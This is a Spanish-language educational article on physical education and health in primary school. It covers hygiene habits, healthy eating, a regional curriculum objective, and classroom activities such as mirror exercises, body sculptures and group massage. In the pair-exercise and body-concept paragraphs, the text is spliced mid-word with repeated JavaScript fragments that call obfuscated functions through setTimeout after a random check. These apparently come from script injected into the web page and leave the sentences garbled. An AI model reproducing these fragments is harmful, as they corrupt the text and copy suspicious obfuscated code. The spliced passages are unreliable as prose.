LA EDUCACIÓN FÍSICA Y LA SALUD

Autora: Miryan Santos Pizarro

         Desde el sistema educativo se ha confiado al área de Educación Física el tratamiento de los contenidos relacionados con la salud y la actividad física. 

         Tener un cuerpo significa quererlo. La mente y el cuerpo constituyen un solo sistema, son interactivos y se influyen mutuamente. No se puede realizar un cambio en uno sin que el otro no sea afectado.

         En este sentido, La Salud tiene que ver con el universo entero, con el cosmos, con el interior del ser humano, con su alma, con su capacidad de ser integral y de aceptar los regalos que la vida le pone ante los ojos y ante el espíritu.

         La conciencia corporal es el puente de retorno a una relación armónica con el universo, esta conciencia corporal ha sido reprimida. Nuestro cuerpo tiene mucho que contarnos y estar a la escucha de sus mensajes, sus signos, es prestar atención a los procesos personales más profundos.

          La Salud  se define como el estado de completo bienestar físico, mental y social, y no solamente la ausencia de infecciones o enfermedades, según la definición de la Organización Mundial de la Salud realizada en su constitución de 1946[.] También puede definirse como el nivel de eficacia funcional o metabólica de un organismo tanto a nivel micro (celular) como en el macro (social). 

           En toda la legislación a nivel nacional y autonómico que hace referencia al currículo de Educación Física se relaciona estrechamente la realización de actividad física con la salud y calidad de vida, de hecho en Educación Primaria tiene un bloque de contenidos específico y en Educación Secundaria aparece el bloque de contenidos de Condición Física y Salud, debido a la relación que tienen ambas en el contexto educativo.

           Algunos ejemplos de lo mencionado anteriormente lo tenemos en el DECRETO 82/2007, de 24 de abril, por el que se establece el Currículo de Educación Primaria para la Comunidad Autónoma de Extremadura, marca como objetivos generales de Área de Educación Física y señala lo siguiente:

           Objetivo 2: Apreciar la importancia de la Educación Física para la salud, teniendo una actitud responsable hacia uno mismo y de respeto a los demás, y reconociendo los efectos del ejercicio físico, de la higiene, de la alimentación, de los hábitos posturales sobre la salud y la calidad de vida. 

        Llamamos hábitos saludables a todas aquellas conductas y comportamiento que tenemos asumidas como propias y que inciden prácticamente en nuestro bienestar físico, mental y social. Dentro de esta propuesta voy a desarrollar los hábitos higiénicos a nivel individual y a nivel colectivo; y los hábitos alimenticios.


a.     Hábitos higiénicos

    Se puede definir como las normas de prevención de accidentes y enfermedades, y de respeto por el entorno; proporcionan las condiciones idóneas para una mejor calidad de vida y hacen referencia a uno de los principios de la prevención: la higiene.

    Los hábitos higiénicos protegen la salud del individuo (hábitos individuales) y la de los demás (hábitos colectivos). Deben aplicarse durante toda la vida, pero, sobre todo, en la práctica de la actividad física. Aquí expongo algunos de los hábitos que son necesarios incluir en la vida cotidiana de las personas.

  • Hábitos higiénicos individuales:
    • Higiene del cuerpo: Limpieza diaria de la piel mediante la ducha; cepillado de dientes después de cada ingesta de alimentos
    • Indumentaria: Se debe llevar una ropa limpia, cómoda y adecuada a la actividad que se va a llevar a cabo; el calzado ha de ser transpirable, cómodo e igual que la ropa adecuada a la actividad a realizar.
    • Elementos de seguridad: respetar las normas, hacer un uso adecuado del material y de las instalaciones son elementos necesarios para evitar accidentes y prevenir lesiones.
  • Hábitos higiénicos colectivos:
    • Durante la práctica de actividad física: estar bien hidratado, mantener limpia las instalaciones y en buen estado el material, comunicar al profesor o a la persona encargada de material cualquier incidencia con éste.
    • En el entorno urbano: hacer un buen uso de las papeleras, respetar los espacios, evitar hacer ruidos molestos para los demás, recoger cualquier desperdicio o basura que es nos caiga al suelo.
    • Respecto al entorno natural y el medio ambiente: respetar las señales indicadas, no hacer fuego en zonas no habilitadas para ello, hacer un consumo responsable del agua y de la energía, no dejar residuos a nuestra marcha, reciclar lo máximo posible, mantener el medio ambiente.

b.     Hábitos alimentarios

    Los hábitos alimentarios se definen como rutina diaria que acompaña el acto de comer; incluye horarios, cantidades, tipo de alimentos, preparaciones y gustos. Estos son afectados por creencias, herencia cultural familiar, capacidad de compra y el conocimiento que se tenga acerca de la alimentación.

    Las necesidades del cuerpo humano, por lo que se refiere a la actividad física, son, además de estructurales y reguladoras para el correcto funcionamiento del organismo, energéticas. En general, mantener unos hábitos alimentarios correctos ayuda a prevenir enfermedades, permite el buen funcionamiento de todos los órganos, aparatos y sistemas del organismo, y proporciona la energía necesaria para practicar actividad física.


Los elementos a tratar son los siguientes:

  • Conocer los beneficios de una buena alimentación.
  • Crear actitudes críticas frente a los mensajes de los medios de comunicación y la publicidad.
  • Conocer y aplicar las normas básicas para llevar unos buenos hábitos alimenticios.
  • Conocer y trabajar sobre la pirámide alimenticia para analizar la calidad de nuestra alimentación.
  • Exponer las numerosas enfermedades que son consecuencia de unos malos hábitos alimenticios.
  • Conocer los trastornos alimenticios: anorexia y bulimia.

Consejos para una alimentación saludable:

  • La higiene tanto personal como del lugar en que comemos.
  • El tiempo destinado a comer: no se debe comer con prisas, hay que masticar y comer con calma, aunque tampoco excesivamente, ya que de lo contrario se puede derivar en problemas gástricos (úlceras, hernias…).
  • Se deben realizar, al menos, cuatro comidas diarias (desayuno, comida, merienda y cena) y con unos horarios marcados.
  • Hay que comer de todo pero olvidarse de alimentos que aporten solo calorías y no lleven vitaminas ni componentes sanos.
  • Comer bien no engorda. Si llevamos una dieta equilibrada conseguiremos salud tanto interior como exterior.
  • No comer antes ni inmediatamente después de realizar ejercicio físico.
  • Asociar la alimentación adecuada con la práctica de ejercicio físico.

 

         A continuación proponemos los siguientes ejercicios más comunes que se pueden realizar en una clase del primer ciclo de Educación  Primaria de Educación Física.


Ejercicios por parejas: 

        Frente a frente, un miembro de la pareja hace unos movimientos que serán imitados por el otro (como si estuvieran frente a un espejo). Luego se hace cambio de pareja.

          Un miembro de la pareja diseña una escultura con el cuerpo del otro Se agrupan todas las esculturas en el salón. El grupo escultor recorre el salón mirandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las esculturas. Luego se cambian los roles.

  • ¿Cómo nos sentimos con el ejercicio en parejas?
  • ¿Qué observamos en las esculturas?

         Con la palabra “cuerpo”, o “esquema corporal”, se indica todo el ser, no solo su realidad física – su carne – su organismo- su exterior – o el lugar donde reside lo humano. Es mucho más. Yo soy mi cuerpo. Y esta es una visión integral del ser humano. No tenemos un cuerpo; somos un cuerpo.

         Un cuerpo que se refiere a la persona entera, sin negar la dimensión espiritual de ésta, sino subrayandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andeza de lo humano en su totalidad.


         Se nos enseña el cuerpo como un lugar para la enfermedad, el dolor y el sufrimiento, no como el lugar para el placer y la realización.

 Sintiendo el contacto:

        Todo el grupo, sentado uno detrás del otro en círculo, se dará un masaje en la espalda, los hombros y el cuello.

        El masaje lo inicia el primero de la fila, lo continúa el segundo y así sucesivamente. Todos con los ojos cerrados.

       Masaje significa compartir el tacto. Las manos actúan sobre el cuerpo, la cabeza, las manos o los pies. Pero el masaje va más allá de la piel, más allá de los músculos, y los huesos. Un buen masaje penetra en lo más profundo del ser. Todo lo que se necesita para dar un buen masaje es: Sensibilidad, atención, un poco de energía y tiempo.

          En primer lugar, se debe contar con un sitio cálido, silencioso y ropa cómoda. Deben lavarse las manos al iniciar y terminar el masaje.